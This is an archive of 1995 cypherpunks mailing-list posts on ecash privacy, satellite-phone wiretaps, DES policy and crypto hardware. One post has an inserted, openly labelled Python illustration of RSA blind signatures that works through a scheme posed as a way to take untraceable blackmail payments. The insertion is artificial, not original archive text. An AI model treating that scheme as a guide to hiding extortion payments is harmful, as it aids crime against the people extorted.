	Also, the usability of RC4 is very open to question.  Since it
was a trade secret, it was not patented.  Several smart people have
said that once a trade secret becomes well known, its out protections.
But few people want to get a nasty letter from RSA's lawyers, so no
one in the US has released anything with RC4 in it without the RSA
licenses.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: koontz@MasPar.COM (David G. Koontz)
Date: Thu, 27 Jul 95 14:46:14 PDT
To: cypherpunks@toad.com
Subject: Re:  Sat phone permit "wire"taps
Message-ID: <9507272149.AA07902@argosy.MasPar.COM>
MIME-Version: 1.0
Content-Type: text/plain


>  "Officials said government police authorities have expressed concern
>that satellite telephone systems may enable people to conduct
>conversations that are out of the earshot of government investigators. 

Perish the thought that We the People might be sovereign.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 27 Jul 95 07:03:23 PDT
To: cypherpunks@toad.com
Subject: Re: Full text of David Chaum's Congressional speech
Message-ID: <Pine.3.89.9507271436.A20183-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 27 Jul 1995, Marcel van der Peijl wrote:

> Ecash itself is less
> prone to abuse than paper bank notes, because privacy is "one-way,"
> which means that an extortionist, a seller on a black-market, or the
> acceptor of a bribe is forever vulnerable to being irrefutably
> incriminated by the party that paid them.

Now, I'm not sure of this, but as far as I can see, if I was a 
blackmailer wanting to receive an untraceable payment I could do the 
following :

	I create my ecash serial number/hash
	I blind it with a random number
	I send it to the payer

	Payer blinds it again and sends it to the bank
	
	Bank signs it and returns it

	Payer removes their blinding and returns the result to me

	I remove my blinding and send it to the bank for payment with
	no chance of being traced.

Will this work ?

		Mark
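
[Added example, not part of Mark Grant's message and not DigiCash code: the algebra of the five steps listed above, worked with textbook RSA blind signatures. The toy key, the serial strings and every function name are constructed for illustration, and the post does not say whether the real ecash protocol matches this textbook form.]

```python
# Added illustration: textbook RSA blind signatures with a toy key.
import hashlib
import secrets
from math import gcd

# Constructed toy bank key from two Mersenne primes (far too small for real use).
P, Q = 2**61 - 1, 2**89 - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # bank's private exponent (Python 3.8+)


def coin_value(serial: bytes) -> int:
    """Map a coin serial number to an integer mod N (the 'hash' in the post)."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def fresh_factor() -> int:
    """Random blinding factor that is invertible mod N."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            return r


def blind(x: int, r: int) -> int:
    return (x * pow(r, E, N)) % N


def unblind(x: int, r: int) -> int:
    return (x * pow(r, -1, N)) % N


def bank_sign(x: int) -> int:
    """The bank signs the value it is handed; blinding hides what it is."""
    return pow(x, D, N)


def verify(m: int, sig: int) -> bool:
    return pow(sig, E, N) == m


def double_blind_exchange(serial: bytes) -> dict:
    """Run the steps from the post and record what each party handled."""
    m = coin_value(serial)                   # payee creates serial number/hash
    r_payee = fresh_factor()
    to_payer = blind(m, r_payee)             # payee blinds, sends to payer
    r_payer = fresh_factor()
    to_bank = blind(to_payer, r_payer)       # payer blinds again, sends to bank
    from_bank = bank_sign(to_bank)           # bank signs and returns
    to_payee = unblind(from_bank, r_payer)   # payer removes own blinding
    sig = unblind(to_payee, r_payee)         # payee removes own blinding
    return {
        "coin": (m, sig),                    # what is later deposited
        "payer_view": (to_payer, to_payee),
        "bank_withdrawal_view": (to_bank, from_bank),
    }


def factor_explaining(view: int, m: int) -> int:
    """Return r with blind(m, r) == view. Computing it needs D, so only the
    bank (or this demo) can; the point is that such an r exists for every
    invertible m, so a blinded value fits any coin equally well."""
    return pow((view * pow(m, -1, N)) % N, D, N)


if __name__ == "__main__":
    t = double_blind_exchange(b"constructed-serial-0001")
    print("deposited coin verifies:", verify(*t["coin"]))
```

Because blinding is multiplication by r^e, the two layers commute and the final value equals the bank's ordinary signature on the coin. This settles only the arithmetic; whether a deployed withdrawal protocol would let a payer submit a value prepared by someone else is a separate protocol question.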





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marcel van der Peijl" <bigmac@digicash.com>
Date: Thu, 27 Jul 95 06:09:35 PDT
To: cypherpunks@toad.com
Subject: Full text of David Chaum's Congressional speech
Message-ID: <199507271307.PAA21979@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain


Here's the full text of the speech David Chaum gave in his
Congressional hearing. I will also make it available for online 
reading on our web server in the publications section.

--- cut here ---

Mr. Chairman, Members of the Committee:

As an American who is regarded as the inventor of electronic cash,
who has worked over the last dozen or so years to make the technology
viable, and who is now CEO of a leading company pioneering in its
commercialization, I am very pleased by the interest being shown
here and to be here today. 

We are being forced to decide between two very different kinds of
electronic payment technology.  The core values we as a nation have
fought for, and continue to stand for, are at stake.  As a
consequence of choosing one of the two directions, these values will
be profoundly eroded; by choosing the other direction, however, they
will be preserved and likely extended.  Wise decisions at this
critical juncture may also allow us to avoid certain other pitfalls
and to realize economic leadership and growth.

I think my limited time before you is best used to briefly explain
the fundamentally different approaches to security, before coming to
privacy, privacy technology, and its implications.

Security

Security is simply the protection of interests.  People want to
protect their own money and banks their own exposure.  The role of
government is to maintain the integrity of, and confidence in, the
whole system.  With electronic cash, just as with paper cash today,
it will be the responsibility of government to protect against
systemic risk.  This is a serious role that cannot be left to the
micro-economic interests of commercial organizations.

In order for those in government to make informed decisions, it will
be necessary for them to understand the basic ways to secure
transactions in different situations.

One basic form is tamper-resistance, exemplified by the chip in a
chip card.  It is designed to be hard to modify or to read secrets
from. Such tamper-resistance is needed for "off-line"
payments--those in which the reader device receiving payment from a
card, validates payments by contacting a central system only at the
end of each day.

(Incidentally, this and the other basic form must rely for security
on cryptography, sometimes referred to as encryption, which is
fundamental to all information security.) 

The other basic form is where the individual uses their own computer,
whether a desk-top, lap-top, or palm-top device.  Such "software
only" is all that is needed in an "on-line" system--a system in which
the party receiving payment communicates over a network during each
payment.

The trend is toward a convergence of these two forms into a
hybrid--since people don't want incompatible forms of money and since
it offers the best of both worlds in terms of convenience; in other
words, you will put a chip card into a user-friendly electronic 
device of your own choosing, whether on your desk, in your living
room, or in your pocket.  I have brought some examples of this to
show you...

The problems I see in the industry today reflect a lack of architecture. 

And architecture is essential when building infrastructure, which is
what we are embarking on.  In my view, a sound architecture must: (i)
include the two basic forms of security, and allow for their 
integration into the hybrid; (ii) prevent the vulnerability of
system-wide secrets from being stored in every card or, nearly as
bad, every off-line point of payment; and (iii) address privacy
concerns effectively, since they cannot be addressed as add-ons or 
afterthoughts.  Today, DigiCash systems are alone in having any of
these three attributes, and their architecture has all three.

Privacy

Let me now turn to this issue of privacy...

A recent Harris poll of the American public began by introducing
respondents to all the consumer benefits of the information
superhighway.  Then respondents were told that in order to make such
systems economically viable, payment transaction data would have to 
be gathered and used for purposes such as making special offers to
them.  But the majority of respondents still objected to any use,
other than consummation of the payment, and they gave privacy as the
primary reason.

Fully 82% of Americans today expressed concern over privacy of
computerized data.  That fraction has been growing steadily ever
since the "first wave" of privacy concern was triggered when
Americans saw their names punched into computer cards or printed on
computer generated forms.  When people are exposed to the
information superhighway, which provides an awesome glimpse of the
power of modern information technology, with dropping transaction
costs leading to finer granularity of  payments (which we will be
hearing more about later), concern will reach new levels.

Privacy Technology

"Privacy technology" allows people to protect their own information,
and other interests, while at the same time it maintains very high
security for organizations.  Essentially, it is the difference
between, on the one hand, a centralized system with disenfranchised 
participants (like the electronically tagged animals in feedlots);
and, on the other hand, a system where each participant is able to
protect its own interests (like buyers and sellers on a town market
square).

Take ecash as an example of privacy technology.  It provides a fully
digital bearer instrument--a number that is itself money, just like a
bank note is money.  On the Internet, once someone downloads the
requisite software, which takes only a few minutes, they are ready to
send and receive ecash in payments. 

Security of ecash is superior to that of paper cash.  If it is
stolen, it cannot be used; if someone refuses to give you a receipt,
you have proof that they deposited it; and if it is lost, you can get
your money and records back.  Counterfeiting ecash poses the same
cryptographic challenge as breaking the most sophisticated codes
used to protect nuclear materials, military secrets and large-value
wire transfers.  Therefore, ecash is certainly not the target of
opportunity.

Ecash is already being experimented with on the Internet in a
worldwide monopoly money trial with tens of thousands of
participants.  Related card technology has been extensively tested,
by DigiCash licensee Amtech, for highway-speed road tolls and road 
pricing, offering privacy instead of dossiers on everywhere people
drive.  And, CAFE, the European Commission sponsored trial, at its
headquarters buildings in Brussels, of chip cards that can be
inserted into electronic wallets (that I have already shown you), 
allows privacy in payments and the electronic ECU.  Such "privacy
technology" was even successfully used by the participants at the
most recent international meeting of data protection commissioners. 

Ecash has received substantial media coverage; consequently, the
public is beginning to realize that the coming of electronic payments
need not mean an obliteration of privacy.  And the superhighway will
give consumers unprecedented mobility to choose it.  Some concern
about ecash, however, has been raised by various parties over
possibilities it might open for illicit payments.  But there is
simply no legitimate basis for these allegations.

Ecash, even when it achieves significant scale, is considerably less
dangerous to society than automatic teller machines.  For one thing,
like cash, the amount withdrawn and deposited is on record; but, for
another, unlike cash, the amounts of money that pass through each
person's hands are also on record at the bank.  Ecash itself is less
prone to abuse than paper bank notes, because privacy is "one-way,"
which means that an extortionist, a seller on a black-market, or the
acceptor of a bribe is forever vulnerable to being irrefutably
incriminated by the party that paid them.

National Leadership

Governments who stifle the new technology while it is still in its
infancy, before it has had a chance to develop and harmonize with
our institutions; who don't pro-actively support needed
infrastructure; or who fail to establish confidence by protecting
against systemic risk--will be left behind in global competition. 
Countries who take clear positions based on understanding of the
technology, however, and encourage needed developments, stand to gain
enormous economic growth and market leadership.  Privacy technology,
whether used for electronic payments, voting, or other public
expression, is the electronic equivalent of a free market and
democracy.  People will come to insist on it as an informational
human right.

Dr. David Chaum, DigiCash

--- cut here ---

// Marcel van der Peijl, DigiCash bv
// http://www.digicash.com/~bigmac/
// There is no signature like no signature!




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Donald M. Kitchen" <don@cs.byu.edu>
Date: Thu, 27 Jul 95 14:49:03 PDT
To: cypherpunks@toad.com
Subject: Attachments, crypto, et al
Message-ID: <199507272147.PAA25723@bert.cs.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

My rule is no binaries, none of the time. Grepping for whitwater and foster
and routing it to /dev/null seems like a good idea too.. And a great big 
*plonk* to our alt.conspiracy friends... Need to learn what a pointer is...

Anyway, my tri-county crime spree for the next weeks will put me in San
Francisco, Alameda, and Orange counties. If anyone wants to mutually sign
keys, email me and I'll try to arrange something.

Unfortunately my cryptoshirt won't arrive in time. I'd be able to wear it
in front of LOTS of illegal aliens. So, to make up for it, I'm going to
export part of the cryptosig: #

Have a nice day.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMBgIxcLa+QKZS485AQFmVAMA0AijobnuJaumiM3LKfwdUK/ENRlbadJ2
DmElG3VDRaYtx4PNPXtjVXkV3CMt2CHEEvs4nmIlieZgOn/UkK0yWDbz95+qhul/
SCwOZ7jWHrika/pJKy2UX4HaEyjHtyvq
=GXbe
-----END PGP SIGNATURE-----
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://bert.cs.byu.edu/~don     or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Death threats ALWAYS pgp signed
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lwp@mail.msen.com (Lou Poppler)
Date: Thu, 27 Jul 95 13:59:31 PDT
To: "Robert A. Rosenberg" <hal9001@panix.com>
Subject: Chiding: (was Re: Banks and Crypto)
In-Reply-To: <v02130500ac3c4aceee4e@hal9001.dialup.access.net>
Message-ID: <qT/FwMz2BwJf083yn@mail.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


Just a friendly toasting, not a flame:
You are totally correct in beseeching this person to use a little
sense with unnecessary abuse of attachments.  This has rapidly grown
to be one of my own pet peeves, as mail agents automatically abuse MIME
without their users probably even knowing what's happening.

BUT: (as I hope you already realize) It is not necessary to send your
lecture to the whole list!  This failure to edit down the recipient list
is another variant of the same transgression you are complaining of.
(At the very least, you could change the subject line, like I am now
going to force myself to do in this message).

On Wed, 26 Jul 1995 23:29:55 -0400,
"Robert A. Rosenberg" <hal9001@panix.com> wrote:
} At 13:25 7/26/95, KDAGUIO@aba.com wrote:
} >See attached file: F:\OFFILES\KODMAIL.MSG
} >
} >
} >
} >Attachment converted: Macintosh HD:KODMAIL.MSG (????/----) (0002C85B)
} 
} 
} Is there ANY reason why you did not just paste the text of this file into
} your message? Also, if you are going to attach files in lieu of writing
} messages, it might be useful to mention what Wordprocessor was used to
} create the file so it can be read. In this case, what format is your file
} in?
} 
} Thank you.
} 
} 
} 

::::::::::::::::::::::::::::::::::::::    Thank you VERY much!  You'll be 
:: Lou Poppler  <lwp@mail.msen.com> ::   getting a Handsome Simulfax Copy 
::      http://www.msen.com/~lwp/   ::   of your OWN words in the mail
::::::::::::::::::::::::::::::::::::::   soon (and My Reply).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted_Anderson@transarc.com
Date: Thu, 27 Jul 95 13:25:55 PDT
To: cypherpunks@toad.com
Subject: Sat phone permit "wire"taps
Message-ID: <kk5zLvz0BwwMNhfwZg@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


I found these paragraphs in a recent Space News interesting.  They were
at the end of an article titled "Military Officials Open To Using
Civilian Links" in the July 3rd issue. 

  "Officials said government police authorities have expressed concern
that satellite telephone systems may enable people to conduct
conversations that are out of the earshot of government investigators. 
This would be particularly true in an area where, for example, there
were no gateway through which government investigators could tap into
calls. 
  "Iridium, Globalstar, Inmarsat-P and Odyssey all plan to include
features to permit authorized eavesdropping, officials said. 
  "``Iridium will include a leased land line to areas where there are
now local gateways to permit monitoring,'' Johnson said.  ``We are
willing to put the technical capability to do this in the hands of the
governments.  They then will have to pay to have all those people listen
to all those telephone calls.''" 

Ted Anderson 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Thu, 27 Jul 95 14:11:27 PDT
To: Censored Girls Anonymous <carolab@censored.org>
Subject: Re: You have cashed my check....
In-Reply-To: <Pine.BSI.3.91.950725170206.8971A-100000@usr4.primenet.com>
Message-ID: <8k601XmMc50e1Dw2ZC@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


First of all, let me publicly apologize for any role we may have played
in your problem.  I don't yet know if there's a bug in our system or
EDS' system that caused this to happen, but if so I assure you it will
be found and fixed.  We are investigating.

I am responding now -- in advance of any real facts to offer you --
primarily because you sent a CC of your mail to so many public lists. 
The "humanhelp" address on your mail will feed into a complex customer
support department, from which you should already have received an
automatic acknowledgement and a "tracking code".  You should receive a
response from one of our human operators within 48 hours.  However, the
way that the humanhelp software works, those answers will NOT
automatically be CC'ed to cypherpunks and all the other places you CC'ed
your question.  Therefore I am answering you now in order to assure
everyone who saw your message (via those widespread CC's) that it is
indeed being handled through the normal channels, but that FV's
responses will not be widely cc'ed.  It will come to you alone, as
private mail.

In general, it isn't necessary to CC the world on your first interaction
with a customer service department; perhaps if you had sent us several
messages and we hadn't answered you, this would have been an appropriate
response.  As it is, the situation is almost certainly either a human
error in the data entry for your bank account or a hitherto-undiscovered
software bug.  But we have many happy sellers who can attest to the fact
that we do regularly deposit money in their bank accounts.  It's not a
scam.  Please don't assume the worst until you give us a chance to
diagnose and fix the problem.

(In fact, if it were a scam, why would we send you an alarming-looking
letter telling you that your bank account information appears to be
invalid?  It seems to me that it would be much smarter for us to just
quietly eat your money, if that's what we wanted to do!)

I assume that you did not, in fact, close or otherwise change your bank
account -- if you did, that would certainly explain the whole episode,
and our system would be functioning completely as intended.  We will
proceed in our investigation under the assumption that this is not the
case, and will let you know (via private email) what we find out.  At
some point, someone may need to contact you via telephone to verify your
account information.  Stay tuned.  -- Nathaniel

--------
Nathaniel S. Borenstein <nsb@fv.com>    |           When privacy is outlawed,
Chief Scientist, First Virtual Holdings |     only outlaws will have privacy!
FAQ & PGP key: nsb+faq@nsb.fv.com       | SUPPORT THE ZIMMERMAN DEFENSE FUND!

---VIRTUAL YELLOW RIBBON-->> zldf@clark.net <http://www.netresponse.com/zldf>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Thu, 27 Jul 95 14:31:07 PDT
To: cypherpunks@toad.com
Subject: Zyxel 28.8K/ISDN modem support of DES
Message-ID: <m0sbaVj-0009tGC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


The data sheets for the new Zyxel modems (Elite 2864/2864I) mention that
they include DES capability.  The fully ISDN 2864I without/with NT-1
retails for $699/$749.  Only the I model (with built-in complete ISDN)
supports DES according to the data sheet.

2864 retails for $549 and they have a non-ISDN modem even cheaper.

They support almost every conceivable feature, including ISDN on both
B channels, ISDN on one with analog conversion on the other, and
built-in microphone and speaker jacks to better support voice
capability. (The 1496E's could be used as voice mail systems, etc.)

Firmware in flash EPROMS (8MBit) and supports 8MByte DRAM sockets for
add-on memory (used to support buffering for its plain paper fax
conversion to the built-in parallel port (without computer help)).

Of course, hard to tell if there's any way to control audio recording/playing
while having an active data connection with the standard eprom.

IF you could find out how to control it OR if there is a way to communicate
in a multichannel way to the various 'peripherals', then you could produce
a pretty nifty PGP-Voice system.

I didn't mention lots of other features (most inherited from the 1496's):
Caller-ID, distinctive ring, touch tone recognition, V.42bis over ISDN,
460.8KBPS/serial.

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Thu, 27 Jul 95 15:47:29 PDT
To: fc@all.net
Subject: Full text of David Chaum's Congressional speech
In-Reply-To: <9507271344.AA17685@all.net>
Message-ID: <199507272242.AA05163@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


Just wondering, but do you have a cost breakdown for the
figure of $ 500.00 for a "cash card?" 

Would this be a single-unit manufactured-in-one-piece card
or something else?

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rev. Mark Grant" <mark@unicorn.com>
Date: Thu, 27 Jul 95 09:47:11 PDT
To: Hal <hfinney@shell.portal.com>
Subject: Re: Full text of David Chaum's Congressional speech
In-Reply-To: <199507271636.JAA26799@jobe.shell.portal.com>
Message-ID: <Pine.3.89.9507271752.A20183-0100000@unicorn.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 27 Jul 1995, Hal wrote:

> There are some technical counter-measures though.  One is to have some
> secure tamper-proof hardware which enforces certain kinds of ecash
> transfers. 

Yes, that's what I was thinking too... you'd have to hack the software 
to do it with the current Ecash implementation, but it ought to be 
possible if you had to.

> IMO payee anonymity will be a desired feature of
> ecash systems and I think Chaum is making a mistake claiming that it will
> not or should not exist.

Yep, I agree...

> Another quibble is that blackmail is not a good example. 

Ooops... brainfade.. yes you're right 8-)..

	Mark





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Phil Fraering        <pgf@tyrell.net>
Date: Thu, 27 Jul 95 15:58:58 PDT
To: Ted_Anderson@transarc.com
Subject: Sat phone permit "wire"taps
In-Reply-To: <kk5zLvz0BwwMNhfwZg@transarc.com>
Message-ID: <199507272254.AA06257@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Ted_Anderson@transarc.com

   I found these paragraphs in a recent Space News interesting.  They were
   at the end of an article titled "Military Officials Open To Using
                                    ^^^^^^^^^^^^^^^
   Civilian Links" in the July 3rd issue. 

[...]
     "Iridium, Globalstar, Inmarsat-P and Odyssey all plan to include
   features to permit authorized eavesdropping, officials said. 

Hmm. Anyone here ever heard of the Walkers, or the Rosenbergs?

It's a pity that the military has decided, in its zeal to listen
in on phone calls, that national security is an expendable asset.

It looks like the Chinese or Russian Armies won't be any better by
the time they're occupying us, unfortunately.

(The really awful part is that what friends I have that are current
or past U.S. military don't want to die, AFAIK).

Phil




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KDAGUIO@aba.com
Date: Fri, 28 Jul 95 05:46:42 PDT
To: cypherpunks@toad.com
Subject: Banks and Crypto - Again
Message-ID: <s0189f37.020@aba.com>
MIME-Version: 1.0
Content-Type: text/plain



I apologize for the earlier transmission error/offense.
Our server has been down intermittently so I have not received
many flames yet.  The meeting mentioned has already taken place
resulting in significant progress toward our goals.
The server is now up.  Flame away my friends.
                                                ...kawika...
******************************************************************

CONTACT:  Sonia Barbara                         FOR IMMEDIATE RELEASE
          (202) 663-5469                        (1995)

ABA REAFFIRMS SUPPORT FOR PRIVATE-SECTOR CONTROL OF CRYPTOGRAPHY

Association Recommends a 10-year Extension for the Data
Encryption Standard

     WASHINGTON, July 21 -- The Data Encryption Standard (DES)
should be recertified for at least 10 more years to allow
interested financial institutions adequate time to convert to any
new cryptography standard, the American Bankers Association said
in a policy statement issued today.
     Encryption is the process whereby sensitive data
communications, such as wire transfers, credit card and automated
teller machine transactions, are protected by secret codes to
protect their confidentiality.   DES, released in 1977, is the
primary method used by financial institutions to encrypt
information.
     Critics say that the longer DES is used, the more likely its
code could be broken.  While realizing this could limit its life
span as a government certified standard, ABA warned that
requiring banks to convert to a new standard by 1998 (the year
DES's certification expires) could be prohibitively costly due to
the high level of electronic funds transfers secured by DES.  ABA
therefore encouraged the National Institute for Standards
and Technology (NIST) to continue to endorse DES as a Federal
Information Processing Standard (FIPS) for use by the financial
community.
     There has been an ongoing debate regarding who should
control the development and support of private-sector computer
security standards:  the government or the private sector.  
ABA strongly recommends that the U.S. government work with the
private sector and Congress in an open forum to develop a
comprehensive policy on the commercial use of cryptography. 
     In its newly-revised policy statement on cryptography, ABA
proposed alternatives  to DES and outlined other criteria that
must be met before changes in cryptographic standards can be
accepted by the banking industry.   These criteria -- which will
be presented next week to representatives of the White House,
U.S. Department of Commerce, National Security Agency (NSA) and
federal banking agencies -- were developed following a two-day
meeting held in June of bankers, vendors and crypto
experts concerned about the federal government's direction
regarding private-sector information security. 
     Specifically, ABA recommended:
     *  The financial services industry be allowed to continue to
use DES based on risk assessment (e.g. value of the transaction)
and the business application involved. 
     *  A security framework encompassing a family of
commercially available algorithms, including DES, be developed. 
This framework should include a process for negotiated algorithm
selection based on the level of risk and other business
requirements.  
     * Opposition to government mandated key management systems
for financial applications where keys would have to be stored
outside the financial institution  (e.g. key
registration/surrender or the mandatory escrow of cryptographic
keys). 
     Instead, banks should continue to be responsible for key
management and continue to cooperate with government for law
enforcement purposes, as required by law.
     * Export of cryptography for financial applications must not
be restricted.
     * Full participation of Congress and the private sector
before establishing a U.S. policy for the commercial use of
cryptography, instead of being carried out solely by Executive
Order.
     [Note:  These recommendations were summarized.  For the full
statement, please call Sonia Barbara at 202/663-5469.]
     The American Bankers Association is the only national trade
and professional association serving the entire banking
community, from small community banks to large bank holding
companies.  ABA members represent approximately 90 percent of the
commercial banking industry's total assets, and about 94 percent
of ABA members are community banks with assets less than $500
million.
                                   ###





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Halvor Kise jr." <halvork@hiof.no>
Date: Thu, 27 Jul 95 11:10:50 PDT
To: "j. ercole" <joee@li.net>
Subject: Re: mac share/freeware app for overwriting unused hd space?
In-Reply-To: <v01510100ac3d51f81e95@[199.173.75.102]>
Message-ID: <Pine.SUN.3.91.950727200343.1566B-100000@gyda>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 27 Jul 1995, j. ercole wrote:
> Can anyone point me towards a program that's freeware or shareware that
> will overwrite all the unused i.e., "trashed" space on my hard drive(s)?  I
> sincerely apologise if this is a faq.  I know norton's will do it but I
> don't presently have that installed on my machine.  Thanks oodles,
> joe

I once had a program called Burn, which is another trashcan, but 
overwrites the data X-times. (You choose yourself how many!)
You can get it at:
ftp://ftp.usa.net/users/mdw/mac/burn/

Hope this helps,
- Halvor.

--
                          *** MEMENTO MORI ***

                PGP-key by fingering halvork@frodo.hiof.no
                       http://www.hiof.no/~halvork/

            * Support The Phil Zimmermann legal defense fund *
                      http://www.netresponse.com/zldf





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jon cameron <cellf@free.org>
Date: Thu, 27 Jul 95 18:18:26 PDT
To: cypherpunks@toad.com
Subject: PS/2 passwd bypassed at bootup?
Message-ID: <Pine.BSD.3.91.950727201615.20637H-100000@squeaky.free.org>
MIME-Version: 1.0
Content-Type: text/plain




I have my crummy IBM PS/2 passwd protected upon turning it on.
I know that removing the battery in a PS/2 deletes the password.
But can it be bypassed by an MIS-type if that person has an 
administration-type of diagnostic/setup/boot-up floppy?

Jon C.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Trost <trost@cloud.rain.com>
Date: Thu, 27 Jul 95 21:44:38 PDT
To: Wolfgang Roeckelein <wolfgang@wi.WHU-Koblenz.de>
Subject: copyrighting algorithms
In-Reply-To: <9507270754.AA04474@sirius.wi.WHU-Koblenz.de>
Message-ID: <m0sbhGO-00004XC@cloud.rain.com>
MIME-Version: 1.0
Content-Type: text/plain


Wolfgang Roeckelein writes:
    >I wasn't aware that you could copyright an algorithm.  Patent,
    >yes, but not copyright.  Intellectual property meens secret,
    >right?  Aren't there any precendence cases involving propriety
    >schemes that are reverse engineered?

    Game cartridges (I think sega was involved)

You might be referring to Nintendo vs. Galoob, which was used as a
sample case in a January 1994 article in the Communications of the
ACM titled "Copyright's Fair use Doctrine and Digital Data".  The
article states

    Nintendo charged Lewis Galoob Toys with contributory copyright
    infringement because Galoob's Game Genie allowed users to alter
    certain aspects of the play of Nintendo video games....
    Nintendo's theory was that Galoob provided consumers with a device
    knowing they would use it to alter the audiovisual sequences of
    the Nintendo games, thereby creating an unauthorized derivative
    work.  Galoob argued fair use in defense.

Nintendo lost the case mostly because Nintendo wasn't going to lose
any money over the device -- after all, you still have to buy the game
cartridge....

As for the quoted material, "Intellectual property meens [sic]
secret" is quite mistaken.  Copyright and patents are the two most
common forms of intellectual property (AFAIK), and neither of them are
secret (unless they're classified patents, but never mind...).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Thu, 27 Jul 95 18:52:32 PDT
To: cypherpunks@toad.com
Subject: cost of attacking cards (fwd)
Message-ID: <9507280146.AA08061@all.net>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
>From fc Thu Jul 27 19:16:26 1995
Subject: cost of attacking cards
To: pgf@tyrell.net (Phil Fraering)
Date: Thu, 27 Jul 1995 19:16:26 -0400 (EDT)
In-Reply-To: <199507272242.AA05163@tyrell.net> from "Phil Fraering" at Jul 27, 95 05:42:57 pm
X-Mailer: ELM [version 2.4 PL22]
Content-Type: text
Content-Length: 608       

> Just wondering, but do you have a cost breakdown for the
> figure of $ 500.00 for a "cash card?" 

I published this stuff about 4 years ago and calculated $5,000, but
a few months ago I spent some time with one of the top people in this
field and he claimed that $500 was the right figure and backed it up
with some experiments.

> Would this be a single-unit manufactured-in-one-piece card
> or something else?

This is based on a volume business where we are breaking cards full time.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 27 Jul 95 22:33:27 PDT
To: cypherpunks@toad.com
Subject: Re: Sat phone permit "wire"taps
Message-ID: <ac3dc3af0402100421cb@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:34 AM 7/28/95, John A. Limpert wrote:

>Is there a technical reason why communications through these future
>satellite systems couldn't be encrypted? I thought that all of these
>systems were based on vocoders and digital transmission, just like
>a secure telephone.

There should be no technical reason why voice encryption, or even
end-to-end digital packet encryption, cannot be used. The various satellite
systems (Iridium, Teledesic, Globalstar, etc.) also are targeting laptops,
personal communicators (a la Newton, Envoy, etc.), and thus cannot afford
to screw with the signal in any significant way. (And error correction
codes could easily deal with even fairly massive screwing around with,
should the satcom companies be foolish enough to try to "dither" the
signals....which I doubt they'll ever do.)

The risk is not technical, but legislative.

The government of the U.S. could, for example, mandate to the satcom
companies that only GAK/escrow encryption is permissible...how enforceable
this is echoes the debate we've had for almost three years on such things.

But the McCaw/Microsoft/Motorola/Qualcomm sorts of companies may have to
make token efforts to comply.

I don't expect the crypto banners to win, long run, but I would guess that
right now they are jawboning with the main satellite companies to make
things harder.

The faster systems like "Nautilus" are deployed, the better.

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Thu, 27 Jul 95 22:41:12 PDT
To: Cypherpunks@toad.com
Subject: The Value of "Attachments" on this List
Message-ID: <ac3dc68405021004cc51@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


See attached file: F:\MYFILES\MAY.MSG


